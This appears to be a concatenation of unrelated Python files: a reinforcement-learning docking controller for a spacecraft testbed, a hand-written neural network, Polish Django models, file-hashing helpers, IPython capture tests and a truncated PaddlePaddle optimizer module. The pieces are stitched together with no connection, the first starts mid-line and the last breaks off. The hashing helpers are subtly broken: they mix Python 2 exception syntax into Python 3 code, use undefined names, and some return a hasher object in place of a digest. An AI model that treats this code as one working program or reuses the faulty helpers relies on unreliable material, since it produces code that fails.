testing? testing = False CHECK_VELOCITY_LIMITS_IN_PYTHON = True HARD_CODE_TARGET_SPIN = False TARGET_SPIN_VALUE = -7*np.pi/180 # [rad/s] SUCCESSFUL_DOCKING_RADIUS = 0.04 # [m] [default: 0.04] overwrite the successful docking radius defined in the environment ############################### ### User-defined parameters ### ############################### offset_x = 0 # Position offset of the target in its body frame offset_y = 0 # Position offset of the target in its body frame offset_angle = 0 # Angle offset of the target in its body frame # Do you want to debug with constant accelerations? DEBUG_CONTROLLER_WITH_CONSTANT_ACCELERATIONS = False constant_Ax = 0 # [m/s^2] in inertial frame constant_Ay = 0 # [m/s^2] in inertial frame constant_alpha = 0 # [rad/s^2] in inertial frame constant_alpha_shoulder = 0 # [rad/s^2] constant_alpha_elbow = 0# [rad/s^2] constant_alpha_wrist = 0# [rad/s^2] def make_C_bI(angle): C_bI = np.array([[ np.cos(angle), np.sin(angle)], [-np.sin(angle), np.cos(angle)]]) # [2, 2] return C_bI class MessageParser: def __init__(self, testing, client_socket, messages_to_deep_guidance, stop_run_flag): print("Initializing Message Parser!") self.client_socket = client_socket self.messages_to_deep_guidance = messages_to_deep_guidance self.stop_run_flag = stop_run_flag self.testing = testing # Items from the Pi self.Pi_time = 0 self.Pi_red_x = 0 self.Pi_red_y = 0 self.Pi_red_theta = 0 self.Pi_red_Vx = 0 self.Pi_red_Vy = 0 self.Pi_red_omega = 0 self.Pi_black_x = 0 self.Pi_black_y = 0 self.Pi_black_theta = 0 self.Pi_black_Vx = 0 self.Pi_black_Vy = 0 self.Pi_black_omega = 0 self.shoulder_theta = 0 self.elbow_theta = 0 self.wrist_theta = 0 self.shoulder_omega = 0 self.elbow_omega = 0 self.wrist_omega = 0 print("Done initializing parser!") def run(self): print("Running Message Parser!") # Run until we want to stop while not self.stop_run_flag.is_set(): if self.testing: # Assign test values # Items from the Pi self.Pi_time = 15 self.Pi_red_x = 3 self.Pi_red_y = 1 self.Pi_red_theta = 0.5 self.Pi_red_Vx = 0 self.Pi_red_Vy = 0 self.Pi_red_omega = 0 self.Pi_black_x = 1 self.Pi_black_y = 1 self.Pi_black_theta = 3.1 self.Pi_black_Vx = 0 self.Pi_black_Vy = 0 self.Pi_black_omega = 0 self.shoulder_theta = 1 self.elbow_theta = 1.2 self.wrist_theta = 0.5 self.shoulder_omega = 0 self.elbow_omega = 0 self.wrist_omega = 0 else: # It's real try: data = self.client_socket.recv(4096) # Read the next value except socket.timeout: print("Socket timeout") continue data_packet = np.array(data.decode("utf-8").splitlines()) #print('Got message: ' + str(data.decode("utf-8"))) # We received a packet from the Pi # input_data_array is: [time, red_x, red_y, red_angle, red_vx, red_vy, red_dangle, black_x, black_y, black_angle, black_vx, black_vy, black_dangle, shoulder_angle, elbow_angle, wrist_angle, shoulder_omega, elbow_omega, wrist_omega] try: self.Pi_time, self.Pi_red_x, self.Pi_red_y, self.Pi_red_theta, self.Pi_red_Vx, self.Pi_red_Vy, self.Pi_red_omega, self.Pi_black_x, self.Pi_black_y, self.Pi_black_theta, self.Pi_black_Vx, self.Pi_black_Vy, self.Pi_black_omega, self.shoulder_theta, self.elbow_theta, self.wrist_theta, self.shoulder_omega, self.elbow_omega, self.wrist_omega = data_packet.astype(np.float32) except: print("Failed data read from jetsonRepeater.py, continuing...") continue if HARD_CODE_TARGET_SPIN: self.Pi_black_omega = TARGET_SPIN_VALUE # Apply the offsets to the target offsets_target_body = np.array([offset_x, offset_y]) offsets_target_inertial = np.matmul(make_C_bI(self.Pi_black_theta).T, offsets_target_body) self.Pi_black_x = self.Pi_black_x - offsets_target_inertial[0] self.Pi_black_y = self.Pi_black_y - offsets_target_inertial[1] self.Pi_black_theta = self.Pi_black_theta - offset_angle # Write the data to the queue for DeepGuidanceModelRunner to use! """ This queue is thread-safe. If I append multiple times without popping, the data in the queue is overwritten. Perfect! """ #(self.Pi_time, self.Pi_red_x, self.Pi_red_y, self.Pi_red_theta, self.Pi_red_Vx, self.Pi_red_Vy, self.Pi_red_omega, self.Pi_black_x, self.Pi_black_y, self.Pi_black_theta, self.Pi_black_Vx, self.Pi_black_Vy, self.Pi_black_omega, self.shoulder_theta, self.elbow_theta, self.wrist_theta, self.shoulder_omega, self.elbow_omega, self.wrist_omega) self.messages_to_deep_guidance.append((self.Pi_time, self.Pi_red_x, self.Pi_red_y, self.Pi_red_theta, self.Pi_red_Vx, self.Pi_red_Vy, self.Pi_red_omega, self.Pi_black_x, self.Pi_black_y, self.Pi_black_theta, self.Pi_black_Vx, self.Pi_black_Vy, self.Pi_black_omega, self.shoulder_theta, self.elbow_theta, self.wrist_theta, self.shoulder_omega, self.elbow_omega, self.wrist_omega)) print("Message handler gently stopped") class DeepGuidanceModelRunner: def __init__(self, testing, client_socket, messages_to_deep_guidance, stop_run_flag): print("Initializing deep guidance model runner") self.client_socket = client_socket self.messages_to_deep_guidance = messages_to_deep_guidance self.stop_run_flag = stop_run_flag self.testing = testing # Initializing a variable to check if we've docked self.have_we_docked = 0. # Holding the previous position so we know when SPOTNet gives a new update self.previousSPOTNet_relative_x = 0.0 # Initialize an environment so we can use its methods self.environment = environment_file.Environment() self.environment.reset(False) # Overwrite the successful docking radius self.environment.SUCCESSFUL_DOCKING_RADIUS = SUCCESSFUL_DOCKING_RADIUS # Uncomment this on TF2.0 #tf.compat.v1.disable_eager_execution() # Clear any old graph tf.reset_default_graph() # Initialize Tensorflow, and load in policy self.sess = tf.Session() # Building the policy network self.state_placeholder = tf.placeholder(dtype = tf.float32, shape = [None, Settings.OBSERVATION_SIZE], name = "state_placeholder") self.actor = BuildActorNetwork(self.state_placeholder, scope='learner_actor_main') # Loading in trained network weights print("Attempting to load in previously-trained model\n") saver = tf.train.Saver() # initialize the tensorflow Saver() # Try to load in policy network parameters try: ckpt = tf.train.get_checkpoint_state('../') saver.restore(self.sess, ckpt.model_checkpoint_path) print("\nModel successfully loaded!\n") except (ValueError, AttributeError): print("Model: ", ckpt.model_checkpoint_path, " not found... :(") raise SystemExit print("Done initializing model!") def run(self): print("Running Deep Guidance!") counter = 1 # Parameters for normalizing the input relevant_state_mean = np.delete(Settings.STATE_MEAN, Settings.IRRELEVANT_STATES) relevant_half_range = np.delete(Settings.STATE_HALF_RANGE, Settings.IRRELEVANT_STATES) # To log data data_log = [] # Run zeros through the policy to ensure all libraries are properly loaded in deep_guidance = self.sess.run(self.actor.action_scaled, feed_dict={self.state_placeholder:np.zeros([1, Settings.OBSERVATION_SIZE])})[0] # Run until we want to stop while not stop_run_flag.is_set(): # Total state is [relative_x, relative_y, relative_vx, relative_vy, relative_angle, relative_angular_velocity, chaser_x, chaser_y, chaser_theta, target_x, target_y, target_theta, chaser_vx, chaser_vy, chaser_omega, target_vx, target_vy, target_omega] *# Relative pose expressed in the chaser's body frame; everything else in Inertial frame #* # Network input: [relative_x, relative_y, relative_angle, chaser_theta, chaser_vx, chaser_vy, chaser_omega, target_omega] ** Normalize it first ** # Get data from Message Parser try: Pi_time, Pi_red_x, Pi_red_y, Pi_red_theta, \ Pi_red_Vx, Pi_red_Vy, Pi_red_omega, \ Pi_black_x, Pi_black_y, Pi_black_theta, \ Pi_black_Vx, Pi_black_Vy, Pi_black_omega, \ shoulder_theta, elbow_theta, wrist_theta, \ shoulder_omega, elbow_omega, wrist_omega = self.messages_to_deep_guidance.pop() except IndexError: # Queue was empty, try agian continue ############################# ### Check if we've docked ### ############################# # Check the reward function based off this state self.environment.chaser_position = np.array([Pi_red_x, Pi_red_y, Pi_red_theta]) self.environment.chaser_velocity = np.array([Pi_red_Vx, Pi_red_Vy, Pi_red_omega]) self.environment.target_position = np.array([Pi_black_x, Pi_black_y, Pi_black_theta]) self.environment.target_velocity = np.array([Pi_black_Vx, Pi_black_Vy, Pi_black_omega]) self.environment.arm_angles = np.array([shoulder_theta, elbow_theta, wrist_theta]) self.environment.arm_angular_rates = np.array([shoulder_omega, elbow_omega, wrist_omega]) # Get environment to check for collisions self.environment.update_end_effector_and_docking_locations() self.environment.update_end_effector_location_body_frame() self.environment.update_relative_pose_body_frame() self.environment.check_collisions() # Ask the environment whether docking occurred self.have_we_docked = np.max([self.have_we_docked, float(self.environment.docked)]) # Extracting end-effector position and docking port position in the Inertial frame end_effector_position = self.environment.end_effector_position docking_port_position = self.environment.docking_port_position # Calculating relative position between the docking port and the end-effector in the Target's body frame docking_error_inertial = end_effector_position - docking_port_position docking_error_target_body = np.matmul(make_C_bI(Pi_black_theta), docking_error_inertial) print("Distance from cone to end-effector in target body frame: ", docking_error_target_body, " Environment thinks we've docked: ", self.have_we_docked) ################################# ### Building the Policy Input ### ################################# total_state = self.environment.make_total_state() policy_input = np.delete(total_state, Settings.IRRELEVANT_STATES) # Normalizing if Settings.NORMALIZE_STATE: normalized_policy_input = (policy_input - relevant_state_mean)/relevant_half_range else: normalized_policy_input = policy_input # Reshaping the input normalized_policy_input = normalized_policy_input.reshape([-1, Settings.OBSERVATION_SIZE]) # Run processed state through the policy deep_guidance = self.sess.run(self.actor.action_scaled, feed_dict={self.state_placeholder:normalized_policy_input})[0] # [accel_x, accel_y, alpha] # Rotating the command into the inertial frame if not Settings.ACTIONS_IN_INERTIAL: deep_guidance[0:2] = np.matmul(make_C_bI(Pi_red_theta).T,deep_guidance[0:2]) # Commanding constant values in the inertial frame for testing purposes if DEBUG_CONTROLLER_WITH_CONSTANT_ACCELERATIONS: deep_guidance[0] = constant_Ax # [m/s^2] deep_guidance[1] = constant_Ay # [m/s^2] deep_guidance[2] = constant_alpha # [rad/s^2] deep_guidance[3] = constant_alpha_shoulder # [rad/s^2] deep_guidance[4] = constant_alpha_elbow # [rad/s^2]] deep_guidance[5] = constant_alpha_wrist # [rad/s^2] ################################################################# ### Cap output if we are exceeding the max allowable velocity ### ################################################################# # Stopping the command of additional velocity when we are already at our maximum """ The check for arm velocity exceeding has been transferred to Simulink - June 1, 2021 """ if CHECK_VELOCITY_LIMITS_IN_PYTHON: current_velocity = np.array([Pi_red_Vx, Pi_red_Vy, Pi_red_omega]) deep_guidance[:len(current_velocity)][(np.abs(current_velocity) > Settings.VELOCITY_LIMIT[:len(current_velocity)]) & (np.sign(deep_guidance[:len(current_velocity)]) == np.sign(current_velocity))] = 0 # Return commanded action to the Raspberry Pi 3 if self.testing: print(deep_guidance) else: deep_guidance_acceleration_signal_to_pi = str(deep_guidance[0]) + "\n" + str(deep_guidance[1]) + "\n" + str(deep_guidance[2]) + "\n" + str(deep_guidance[3]) + "\n" + str(deep_guidance[4]) + "\n" + str(deep_guidance[5]) + "\n" + str(self.have_we_docked) + "\n" self.client_socket.send(deep_guidance_acceleration_signal_to_pi.encode()) if counter % 2000 == 0: print("Output to Pi: ", deep_guidance, " In table inertial frame or joint frame") print(normalized_policy_input) # Incrementing the counter counter = counter + 1 # Log this timestep's data only if the experiment has actually started if Pi_time > 0: data_log.append([Pi_time, deep_guidance[0], deep_guidance[1], deep_guidance[2], \ deep_guidance[3], deep_guidance[4], deep_guidance[5], \ Pi_red_x, Pi_red_y, Pi_red_theta, \ Pi_red_Vx, Pi_red_Vy, Pi_red_omega, \ Pi_black_x, Pi_black_y, Pi_black_theta, \ Pi_black_Vx, Pi_black_Vy, Pi_black_omega, \ shoulder_theta, elbow_theta, wrist_theta, \ shoulder_omega, elbow_omega, wrist_omega, self.have_we_docked]) print("Model gently stopped.") if len(data_log) > 0: print("Saving data to file...",end='') with open('deep_guidance_data_' + time.strftime('%Y-%m-%d_%H-%M-%S', time.localtime()) + '.txt', 'wb') as f: np.save(f, np.asarray(data_log)) else: print("Not saving a log because there is no data to write") print("Done!") # Close tensorflow session self.sess.close() ################################################## #### Start communication with JetsonRepeater ##### ################################################## if testing: client_socket = 0 else: # Looping forever until we are connected while True: try: # Try to connect client_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) client_socket.connect("/tmp/jetsonRepeater") # Connecting... client_socket.settimeout(2) # Setting the socket timeout to 2 seconds print("Connected to JetsonRepeater!") break except: # If connection attempt failed print("Connection to JetsonRepeater FAILED. Trying to re-connect in 1 second") time.sleep(1) # WE ARE CONNECTED # Generate Queues messages_to_deep_guidance = deque(maxlen = 1) ##################### ### START THREADS ### ##################### all_threads = [] stop_run_flag = threading.Event() # Flag to stop all threads # Initialize Message Parser message_parser = MessageParser(testing, client_socket, messages_to_deep_guidance, stop_run_flag) # Initialize Deep Guidance Model deep_guidance_model = DeepGuidanceModelRunner(testing, client_socket, messages_to_deep_guidance, stop_run_flag) all_threads.append(threading.Thread(target = message_parser.run)) all_threads.append(threading.Thread(target = deep_guidance_model.run)) ############################################# ##### STARTING EXECUTION OF ALL THREADS ##### ############################################# # # # # for each_thread in all_threads: # # # each_thread.start() # # # # # ############################################# ############## THREADS STARTED ############## ############################################# counter_2 = 1 try: while True: time.sleep(0.5) if counter_2 % 200 == 0: print("100 seconds in, trying to stop gracefully") stop_run_flag.set() for each_thread in all_threads: each_thread.join() break except KeyboardInterrupt: print("Interrupted by user. Ending gently") stop_run_flag.set() for each_thread in all_threads: each_thread.join() print('Done :)') <reponame>MulattoKid/Multilayerd-General-Neural-Network import numpy as np from matplotlib import pyplot as plt class Layer: def __init__(self, layer_num, num_inputs, num_nodes, is_output_layer): self.layer_num = layer_num self.inputs = np.zeros(shape=(1, num_inputs + 1)) #+1 for bias term self.weights = np.zeros(shape=(num_inputs + 1, num_nodes)) #+1 for bias term self.deltas = np.zeros(shape=(num_nodes, 1)) #Stores delta for each node in layer self.outputs = np.zeros(shape=(1, num_nodes)) self.is_output_layer = is_output_layer self.dropouts = np.ones(shape=(num_nodes)) #Only used if dropout is activated #Weight initialization range=[-1/sqrt(num_nodes), 1/sqrt(num_nodes)) weight_range = 1.0 / np.sqrt(num_inputs) for y in range(self.weights.shape[0]): for x in range(self.weights.shape[1]): self.weights[y][x] = np.random.uniform(-weight_range, weight_range) def Print(self): print() print("Layer number:", self.layer_num) print("Input shape:", self.inputs.shape) print("Weights shape:", self.weights.shape) print("Deltas:", self.deltas.shape[0]) print("Output shape:", self.outputs.shape) print("Is output layer:", self.is_output_layer) def UpdateOutput(self, inputs, apply_dropout, dropout_rate): self.inputs = inputs self.outputs = np.matmul(self.inputs, self.weights) self.outputs = 1.0 / (1.0 + np.exp(-self.outputs)) #Logistic activation function if apply_dropout and not self.is_output_layer: for node in range(len(self.dropouts)): self.dropouts[node] = 1.0 if np.random.uniform() > dropout_rate else 0.0 self.outputs[0] = np.multiply(self.outputs[0], self.dropouts) self.dropouts.fill(1.0) #Reset self.dropouts self.outputs[0] *= 1.0 / (1.0 - dropout_rate) self.outputs = np.append(self.outputs, [[-1]], axis=1) #Add bias term to output so that the next layer has it as part of its input class NeuralNetwork: def __init__(self, layer_sizes, learning_rate, apply_dropout=False, dropout_rate=0.2): self.training_cases = [] self.validation_cases = [] self.num_layers = len(layer_sizes) - 1 #Disregard input layer self.output_layer = self.num_layers - 1 self.num_hidden_layers = self.num_layers - 1 self.num_inputs = layer_sizes[0] #Size of input layer self.layer_sizes = layer_sizes[1:] #Specifies the number of nodes in each hidden layer self.CreateLayers() self.learning_rate = learning_rate self.apply_dropout = apply_dropout self.dropout_rate = dropout_rate self.errors = [] self.Print() def Print(self): print("Number of layers:", self.num_layers, "(+1 if you include input layer)") print("Number of hidden layers:", self.num_hidden_layers) print("Number of inputs:", self.num_inputs) print("Sizes of layers:", self.layer_sizes) for layer in self.layers: layer.Print() print() def CreateLayers(self): self.layers = [] self.layers.append(Layer(0, self.num_inputs, self.layer_sizes[0], self.num_layers == 1)) #Take special care of 1st layer as it depends on the size of the input layer for i in range(1, self.num_layers): #Create remaining layers self.layers.append(Layer(i, self.layer_sizes[i - 1], self.layer_sizes[i], i == self.num_layers - 1)) def FeedForward(self, inputs): self.layers[0].UpdateOutput(inputs, self.apply_dropout, self.dropout_rate) #Perform manual update on first layer for i in range(1, self.num_layers): #Update remaining layers self.layers[i].UpdateOutput(self.layers[i - 1].outputs, self.apply_dropout, self.dropout_rate) def BackpropagationMultiLayer(self, targets): outputs = np.reshape(self.layers[self.output_layer].outputs, newshape=(self.layers[self.output_layer].outputs.shape[1])) #Remove second dimension of output outputs = outputs[:-1] #Remember we add a bias "node" to each layer's output -> remove bias from output so that it is not taken into account when calculating error error = np.sum(0.5 * np.power((targets - outputs), 2)) #Squared Error #Take special care of the output layer's weights for node in range(self.layers[self.output_layer].weights.shape[1]): #For each node in output layer -> column in weight matrix target_v = targets[node] output_v = outputs[node] #Calculate delta-value for current node self.layers[self.output_layer].deltas[node][0] = output_v * (1.0 - output_v) * (target_v - output_v) for weight in range(self.layers[self.output_layer].weights.shape[0]): #For each weight connected to this node -> row in weight matrix input_v = self.layers[self.output_layer].inputs[0][weight] #Get input to current weight #Calculate update for each weight for given node weight_delta = self.layers[self.output_layer].deltas[node] * input_v self.layers[self.output_layer].weights[weight][node] += self.learning_rate * weight_delta for layer in range(self.output_layer - 1, -1, -1): #Iterate over remaining layers, starting from the second to last to the first (excluding input layer) for node in range(self.layers[layer].weights.shape[1]): #For each node in layer -> column in weight matrix #Calculate delta-value for current node node_output = self.layers[layer].outputs[0][node] self.layers[layer].deltas[node] = node_output * (1.0 - node_output) next_layer = layer + 1 delta_addition = 0.0 for weight in range(self.layers[next_layer].weights.shape[1]): #For each weight that connect the current node to a node in next_layer -> iterates through a row in the weight matrix of next_layer delta_addition += self.layers[next_layer].weights[node][weight] * self.layers[next_layer].deltas[weight] self.layers[layer].deltas[node] *= delta_addition for weight in range(self.layers[layer].weights.shape[0]): #For each weight that connect the current node to a node in layer -> row in weight matrix input_v = self.layers[layer].inputs[0][weight] #Get input to current weight #Calculate update for each weight for given node weight_delta = self.layers[layer].deltas[node] * input_v self.layers[layer].weights[weight][node] += self.learning_rate * weight_delta return error def Train(self, epochs, cases, validation_percent=10.0, validation_interval=100, print_interval=100): self.training_cases = cases np.random.shuffle(self.training_cases) #Add bias of -1 to each case for c in range(len(self.training_cases)): self.training_cases[c][0][0].append(-1.0) #Use a certain percentage of training cases as validation set self.validation_cases = self.training_cases[:int(len(self.training_cases) * (validation_percent / 100.0))] #Perform initial validation to see where we start from self.Validate() #Perform training for epoch in range(1, epochs+1): epoch_error = 0.0 for case in self.training_cases: self.FeedForward(case[0]) epoch_error += self.BackpropagationMultiLayer(case[1]) self.errors.append(epoch_error / len(self.training_cases)) if epoch % print_interval == 0: print("Epoch:", epoch) if epoch % validation_interval == 0: print("Epoch:", epoch) self.Validate() def Validate(self): self.Test(self.validation_cases, add_bias=False) def Test(self, cases=[], add_bias=True, few_cases=False): if len(cases) > 0 and add_bias: #Test cases NOT are the same as training cases for c in range(len(cases)): cases[c][0][0].append(-1.0) else: cases = self.training_cases #Use training cases as test cases correct_classifications = 0 for case in cases: self.FeedForward(case[0]) #Print detailed info about each calssification attempt if few_cases: print() print("Case:") print("Input:", case[0][0][:-1]) #Remove bias from print print("Target:", case[1]) print("Output: ", np.round(self.layers[self.output_layer].outputs[0][:-1]), " \n\t(raw: ", self.layers[self.output_layer].outputs[0][:-1], ")", sep='') #Remember to remov ebias term from output for ease of readability if self.layer_sizes[self.output_layer] > 1: #One hot vector winner_index = np.argmax(self.layers[self.output_layer].outputs[0][:-1]) if case[1][winner_index] == 1: correct_classifications += 1 else: if np.round(self.layers[self.output_layer].outputs[0][:-1]) == case[1]: correct_classifications += 1 print("Accuracy: ", float(correct_classifications) / len(cases) * 100.0, "%", sep='') def PlotError(self): x = np.arange(0, len(self.errors)) y = self.errors plt.xlabel('Epoch') plt.ylabel('Squared Error') plt.plot(x, y) plt.show()<filename>src/rozbieznosci_dyscyplin/models.py from django.db import models from django.db.models import DO_NOTHING from bpp.fields import YearField from bpp.models import BazaModeluOdpowiedzialnosciAutorow, TupleField class RozbieznosciViewBase(models.Model): id = TupleField(models.IntegerField(), size=3, primary_key=True) rekord = models.ForeignKey("bpp.Rekord", DO_NOTHING, related_name="+") rok = YearField() autor = models.ForeignKey("bpp.Autor", DO_NOTHING, related_name="+") dyscyplina_rekordu = models.ForeignKey( "bpp.Dyscyplina_Naukowa", DO_NOTHING, related_name="+", null=True, blank=True ) dyscyplina_autora = models.ForeignKey( "bpp.Dyscyplina_Naukowa", DO_NOTHING, related_name="+" ) subdyscyplina_autora = models.ForeignKey( "bpp.Dyscyplina_Naukowa", DO_NOTHING, related_name="+", null=True, blank=True ) class Meta: managed = False abstract = True class BrakPrzypisaniaView(RozbieznosciViewBase): class Meta: managed = False class RozbieznePrzypisaniaView(RozbieznosciViewBase): class Meta: managed = False class RozbieznosciView(RozbieznosciViewBase): # Uwaga: w sytuacji, gdy praca będzie miała jednego i tego samego autora (np w roli redaoktora # oraz autora) to ten model i funkcja get_wydawnictwo_autor_obj zawiedzie. class Meta: managed = False verbose_name = "rozbieżność rekordu i dyscyplin" verbose_name_plural = "rozbieżności rekordów i dyscyplin" def get_wydawnictwo_autor_obj(self) -> BazaModeluOdpowiedzialnosciAutorow: # Uwaga: w sytuacji, gdy praca będzie miała jednego i tego samego autora (np w roli redaoktora # oraz autora) to ten model i funkcja get_wydawnictwo_autor_obj zawiedzie (zwraca wyłacznie pierwszy # rekord z powiazaniem autora + rekordu) return self.rekord.original.autorzy_set.filter(autor=self.autor).first() <gh_stars>1-10 from __future__ import absolute_import, division, print_function # makes code Python 2 and 3 compatible mostly def get_file_md5(filename): with open(filename,'r') as f: chunk_size = 1024 hasher = hashlib.md5() while True: try: data = f.read(chunk_size) except IOError, e: log.error('error hashing %s on Agent %s' % (path, agent.name)) return {'error': '%s' % e} if not data: break hasher.update(data) return hasher def get_file_sha1(filename): with open(filename,'r') as f: chunk_size = 1024 hasher = hashlib.sha1() while True: try: data = f.read(chunk_size) except IOError, e: log.error('error hashing %s on Agent %s' % (path, agent.name)) return {'error': '%s' % e} if not data: break hasher.update(data) return hasher def get_file_md5_and_sha1(filename): with open(filename,'r') as f: chunk_size = 1024 hasher = hashlib.md5() hasher_sha = hashlib.sha1() while True: try: data = f.read(chunk_size) except IOError, e: log.error('error hashing %s on Agent %s' % (path, agent.name)) return {'error': '%s' % e} if not data: break hasher.update(data) hasher_sha.update(data) return (hasher.hexdigest(), hasher_sha.hexdigest())from __future__ import absolute_import from __future__ import division from __future__ import print_function import shutil import sys import tempfile from observations.r.prestige import prestige def test_prestige(): """Test module prestige.py by downloading prestige.csv and testing shape of extracted data has 102 rows and 6 columns """ test_path = tempfile.mkdtemp() x_train, metadata = prestige(test_path) try: assert x_train.shape == (102, 6) except: shutil.rmtree(test_path) raise() # encoding: utf-8 """Tests for IPython.utils.capture""" #----------------------------------------------------------------------------- # Copyright (C) 2013 The IPython Development Team # # Distributed under the terms of the BSD License. The full license is in # the file COPYING, distributed as part of this software. #----------------------------------------------------------------------------- #----------------------------------------------------------------------------- # Imports #----------------------------------------------------------------------------- import sys import pytest from IPython.utils import capture #----------------------------------------------------------------------------- # Globals #----------------------------------------------------------------------------- _mime_map = dict( _repr_png_="image/png", _repr_jpeg_="image/jpeg", _repr_svg_="image/svg+xml", _repr_html_="text/html", _repr_json_="application/json", _repr_javascript_="application/javascript", ) basic_data = { 'image/png' : b'binarydata', 'text/html' : "<b>bold</b>", } basic_metadata = { 'image/png' : { 'width' : 10, 'height' : 20, }, } full_data = { 'image/png' : b'binarydata', 'image/jpeg' : b'binarydata', 'image/svg+xml' : "<svg>", 'text/html' : "<b>bold</b>", 'application/javascript' : "alert();", 'application/json' : "{}", } full_metadata = { 'image/png' : {"png" : "exists"}, 'image/jpeg' : {"jpeg" : "exists"}, 'image/svg+xml' : {"svg" : "exists"}, 'text/html' : {"html" : "exists"}, 'application/javascript' : {"js" : "exists"}, 'application/json' : {"json" : "exists"}, } hello_stdout = "hello, stdout" hello_stderr = "hello, stderr" #----------------------------------------------------------------------------- # Test Functions #----------------------------------------------------------------------------- @pytest.mark.parametrize("method_mime", _mime_map.items()) def test_rich_output_empty(method_mime): """RichOutput with no args""" rich = capture.RichOutput() method, mime = method_mime assert getattr(rich, method)() is None def test_rich_output(): """test RichOutput basics""" data = basic_data metadata = basic_metadata rich = capture.RichOutput(data=data, metadata=metadata) assert rich._repr_html_() == data["text/html"] assert rich._repr_png_() == (data["image/png"], metadata["image/png"]) assert rich._repr_latex_() is None assert rich._repr_javascript_() is None assert rich._repr_svg_() is None @pytest.mark.parametrize("method_mime", _mime_map.items()) def test_rich_output_no_metadata(method_mime): """test RichOutput with no metadata""" data = full_data rich = capture.RichOutput(data=data) method, mime = method_mime assert getattr(rich, method)() == data[mime] @pytest.mark.parametrize("method_mime", _mime_map.items()) def test_rich_output_metadata(method_mime): """test RichOutput with metadata""" data = full_data metadata = full_metadata rich = capture.RichOutput(data=data, metadata=metadata) method, mime = method_mime assert getattr(rich, method)() == (data[mime], metadata[mime]) def test_rich_output_display(): """test RichOutput.display This is a bit circular, because we are actually using the capture code we are testing to test itself. """ data = full_data rich = capture.RichOutput(data=data) with capture.capture_output() as cap: rich.display() assert len(cap.outputs) == 1 rich2 = cap.outputs[0] assert rich2.data == rich.data assert rich2.metadata == rich.metadata def test_capture_output(): """capture_output works""" rich = capture.RichOutput(data=full_data) with capture.capture_output() as cap: print(hello_stdout, end="") print(hello_stderr, end="", file=sys.stderr) rich.display() assert hello_stdout == cap.stdout assert hello_stderr == cap.stderr def test_capture_output_no_stdout(): """test capture_output(stdout=False)""" rich = capture.RichOutput(data=full_data) with capture.capture_output(stdout=False) as cap: print(hello_stdout, end="") print(hello_stderr, end="", file=sys.stderr) rich.display() assert "" == cap.stdout assert hello_stderr == cap.stderr assert len(cap.outputs) == 1 def test_capture_output_no_stderr(): """test capture_output(stderr=False)""" rich = capture.RichOutput(data=full_data) # add nested capture_output so stderr doesn't make it to nose output with capture.capture_output(), capture.capture_output(stderr=False) as cap: print(hello_stdout, end="") print(hello_stderr, end="", file=sys.stderr) rich.display() assert hello_stdout == cap.stdout assert "" == cap.stderr assert len(cap.outputs) == 1 def test_capture_output_no_display(): """test capture_output(display=False)""" rich = capture.RichOutput(data=full_data) with capture.capture_output(display=False) as cap: print(hello_stdout, end="") print(hello_stderr, end="", file=sys.stderr) rich.display() assert hello_stdout == cap.stdout assert hello_stderr == cap.stderr assert cap.outputs == [] # Copyright (c) 2016 PaddlePaddle Authors. All Rights Reserved # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import paddle.trainer_config_helpers.config_parser_utils as config_parser_utils import paddle.trainer_config_helpers.optimizers as v1_optimizers from paddle.proto.OptimizerConfig_pb2 import OptimizerConfig __all__ = [ 'Momentum', 'Adam', 'Adamax', 'AdaGrad', 'DecayedAdaGrad', 'AdaDelta', 'RMSProp', 'ModelAverage', 'L2Regularization' ] class Optimizer(object): def __init__(self, **kwargs): import py_paddle.swig_paddle as swig_api if 'batch_size' in kwargs: del kwargs['batch_size'] # not important for python library. def __impl__(): v1_optimizers.settings(batch_size=1, **kwargs) self.__opt_conf_proto__ = config_parser_utils.parse_optimizer_config( __impl__) self.__opt_conf__ = swig_api.OptimizationConfig.createFromProto( self.__opt_conf_proto__) def enable_types(self): """ get enable_types for each optimizer. enable_types = [value, gradient, momentum, etc] For each optimizer(SGD, Adam), GradientMachine should enable different buffers. """ import py_paddle.swig_paddle as swig_api tmp = swig_api.ParameterOptimizer.create(self.__opt_conf__) assert isinstance(tmp, swig_api.ParameterOptimizer) return tmp.getParameterTypes() def __create_local_updater__(self): import py_paddle.swig_paddle as swig_api return swig_api.ParameterUpdater.createLocalUpdater(self.__opt_conf__) def __create_remote_updater__(self, pass_num, use_sparse_updater): import py_paddle.swig_paddle as swig_api return swig_api.ParameterUpdater.createRemoteUpdater( self.__opt_conf__, pass_num, use_sparse_updater) def __create_new_remote_updater__(self, pserver_spec, use_etcd): import py_paddle.swig_paddle as swig_api return swig_api.ParameterUpdater.createNewRemoteUpdater( self.__opt_conf__, pserver_spec, use_etcd) def create_updater(self, is_local, num_passes, use_sparse_updater, pserver_spec, use_etcd): """ create proper parameter_updater by configuration. :param is_local: create local or remote parameter updater :param num_passes: remote parameter updater will use this to config parameter server. :param use_sparse_updater: when use remote updater, if some parameter is sparse, updater should do some extra thing: .. code-block:: python if use_sparse_remote_updater: gradient_machine.prefetch(in_args) parameter_updater.getParametersRemote() :param pserver_spec: pserver location, eg: localhost:3000, if use etcd, pserver_spec should be the etcd endpoints, eg: http://localhost:2379 :return: parameter_updater """ if is_local: parameter_updater = self.__create_local_updater__() else: if pserver_spec is None: parameter_updater = self.__create_remote_updater__( num_passes, use_sparse_updater) else: parameter_updater = self.__create_new_remote_updater__( pserver_spec, use_etcd) return parameter_updater class Momentum(Optimizer): """ Momentum Optimizer. When sparse=False, the momentum update formula is as follows: .. math:: v_{t} &= k * v_{t-1} - \\gamma_t (g_{t} + \\lambda w_{t-1}) \\\\ w_{t} &= w_{t-1} + v_{t} \\\\ where, :math:`k` is momentum, :math:`\\lambda` is decay rate, :math:`\\gamma_t` is learning rate at the t'th iteration. :math:`w_{t}` is the weight as the t'th iteration. And the :math:`v_{t}` is the history momentum variable. When sparse=True, the update scheme: .. math:: \\alpha_t &= \\alpha_{t-1} / k \\\\ \\beta_t &= \\beta_{t-1} / (1 + \\lambda \\gamma_t) \\\\ u_t &= u_{t-1} - \\alpha_t \\gamma_t g_t \\\\ v_t &= v_{t-1} + \\tau_{t-1} \\alpha_t \\gamma_t g_t \\\\ \\tau_t &= \\tau_{t-1} + \\beta_t / \\alpha_t where :math:`k` is 